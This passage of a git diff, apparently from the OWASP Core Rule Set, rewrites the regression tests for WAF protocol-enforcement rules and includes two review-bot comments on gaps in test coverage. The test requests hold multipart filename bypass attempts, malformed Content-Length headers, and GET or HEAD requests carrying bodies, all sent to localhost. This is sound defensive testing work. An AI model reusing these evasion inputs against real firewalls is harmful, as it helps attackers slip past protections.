stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="&fi;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-37 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="&fi;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 37 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES_NAMES." 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="test"; filename="&fi;zzz" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-38 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="test"; filename="&fi;zzz" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 38 desc: "Attempted multipart/form-data bypass (920120). Don't match ; that are part of HTML entities in both FILES and FILES_NAMES." 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-39 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 39 desc: "Attempted multipart/form-data bypass (920120). Allow empty fields." 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name=""; filename="" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name=""; filename="" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml index cc167e38f..7b8191f98 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml 
@@ -1,122 +1,121 @@ --- meta: author: "Paul-Beckett, azurit" - enabled: true - name: "920121.yaml" description: "Tests to trigger rule 920121" +rule_id: 920121 tests: - - test_title: 920121-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te;st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te;st.txt" + Content-Type: text/plain - Some-file-test-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-2 + Some-file-test-here + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920121] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te'st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: 
"multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te'st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-3 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920121] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te\"st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te\"st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-4 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920121] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te=st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te=st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-5 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920121] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="test.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="test.txt" + Content-Type: text/plain - Characters-shouldn't-trigger-rule-"-match-in-;-file - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: "id 
\"920121\"" + Characters-shouldn't-trigger-rule-"-match-in-;-file + ----------397236876-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920121] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index 4678ce4f9..aa61ceb50 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml 
@@ -1,108 +1,103 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920160.yaml" description: "Tests to trigger rule 920160" +rule_id: 920160 tests: - - # Non digit Content-Length without content-type - test_title: 920160-1 + - test_id: 1 + desc: Non digit Content-Length without content-type stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Length: "NotDigits" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: [400] - - # Non digit content-length with content-type - test_title: 920160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Length: "NotDigits" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 2 + desc: Non digit content-length with content-type stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "NotDigits" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: [400] - - # Mixed digit and non digit content length - test_title: 920160-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "NotDigits" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 3 + desc: 
Mixed digit and non digit content length stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "123x" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: [400] - - # Test is based in httpbin.org, so backend returns 405 if you are not posting to /post - # Apache auto corrects for this error now so the log should not contain anything - test_title: 920160-4 - desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "123x" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 4 + desc: | + Content-Length HTTP header is not numeric (920160) from old modsec regressions + Test is based in httpbin.org, so backend returns 405 if you are not posting to /post + Apache auto corrects for this error now so the log should not contain anything stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Length: '3' - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /post - version: HTTP/1.0 - data: abc - output: - status: [200] - no_log_contains: id "920160" - - test_title: 920160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Length: '3' + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /post + version: HTTP/1.0 + data: abc + output: + status: 200 + log: + no_expect_ids: [920160] + - test_id: 5 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Length: "3;" - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.0 - data: abc - output: - status: [200, 403, 400] - # log_contains: id "920160" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Length: "3;" + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.0 + data: abc + output: + status: 400 diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml index 6b28cdc35..a8f4b8942 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml 
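Review bot: After this rewrite no test in 920160.yaml asserts that rule 920160 fires — tests 1, 2, 3 and 5 only pin `status: 400`, test 4 is the negative case, and the commented-out `log_contains: id "920160"` that test 5 used to carry is dropped rather than turned into `log: expect_ids: [920160]`. The 400 presumably comes from the web server's own request parser rejecting `Content-Length: NotDigits` / `123x` / `3;` before CRS evaluates the header, so the rule's regex itself has no coverage here and an engine whose HTTP parser is more lenient about Content-Length would not be exercised by this suite. If the status pin is the only practical check, say so in the test, e.g. `desc: "Content-Length '3;' is rejected by the web server (400) before CRS runs; 920160 itself cannot be asserted here"`. Otherwise add `log: expect_ids: [920160]` to test 5, which the old `status: [200, 403, 400]` expectation suggests was once the intent.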
@@ -1,122 +1,122 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920170.yaml" description: "A Selection of tests to trigger rule 920170" +rule_id: 920170 tests: - - # POST Request with data (valid) - test_title: 920170-1 + - test_id: 1 + desc: POST Request with data (valid) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" - - # GET request with data - test_title: 920170-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920170] + - test_id: 2 + desc: GET request with data stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920170\"" - - # Head Request with data - test_title: 920170-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + 
log: + expect_ids: [920170] + - test_id: 3 + desc: Head Request with data stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "HEAD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920170\"" - - # GET Request but content length is 0 and data is provided - # Weird HTTP 1.0 support bug in Apache, without newline causes 408 - test_title: 920170-4 + - input: + dest_addr: "127.0.0.1" + method: "HEAD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920170] + - test_id: 4 + desc: | + GET Request but content length is 0 and data is provided. + Weird HTTP 1.0 support bug in Apache, without newline causes 408 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test\r\n" - stop_magic: true - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" - - # GET request with content length 0 and no data. 
- test_title: 920170-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test\r\n" + uri: "/" + version: "HTTP/1.1" + autocomplete_headers: false + output: + log: + no_expect_ids: [920170] + - test_id: 5 + desc: GET request with content length 0 and no data. stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" - - test_title: 920170-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920170] + - test_id: 6 desc: GET or HEAD Request with Body Content (920170) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: / - data: abc - version: "HTTP/1.1" - output: - log_contains: id "920170" + - input: + dest_addr: 127.0.0.1 + headers: + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: / + data: abc + version: "HTTP/1.1" + output: + log: + expect_ids: [920170] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml index 7d515219a..dbd5fe977 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml 
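Review bot: The `desc` added for test 4 still says "Weird HTTP 1.0 support bug in Apache, without newline causes 408", but the stage sends `version: "HTTP/1.1"` and asserts only `no_expect_ids`, so a reader cannot tell which server behaviour the trailing `\r\n` in `data` works around or why no status is pinned. The HTTP/1.0 reference looks like a leftover from an earlier form of the test; reword it to what is actually exercised, e.g. `desc: "GET with explicit Content-Length: 0 but a body present; trailing CRLF avoids an Apache 408, rule must not fire"`. Since `stop_magic: true` became `autocomplete_headers: false` here, it is also worth noting in the desc that the explicit `Content-Length: "0"` must not be autocompleted away, as that is the whole point of the case.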
@@ -1,76 +1,75 @@ --- meta: author: airween - enabled: true - name: 920171.yaml description: "A Selection of tests to trigger rule 920171" +rule_id: 920171 tests: - # POST Request with data (valid) - test_title: 920171-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked POST request with content "Hi CRS" in two lines - # POST / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" - output: - no_log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked POST request with content "Hi CRS" in two lines + # POST / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" + output: + log: + no_expect_ids: [920171] - # GET Request with chunked data (invalid) - test_title: 920171-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked GET request with content "Hi CRS" in two lines - # GET / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVu\nY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQoz\nDQpIaSANCjMNCkNSUw0KMA0KDQo=" - 
output: - log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked GET request with content "Hi CRS" in two lines + # GET / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVu\nY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQoz\nDQpIaSANCjMNCkNSUw0KMA0KDQo=" + output: + log: + expect_ids: [920171] - # HEAD Request with chunked data (invalid) - test_title: 920171-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked HEAD request with content "Hi CRS" in two lines - # HEAD / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" - output: - log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked HEAD request with content "Hi CRS" in two lines + # HEAD / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" + output: + log: + expect_ids: [920171] 
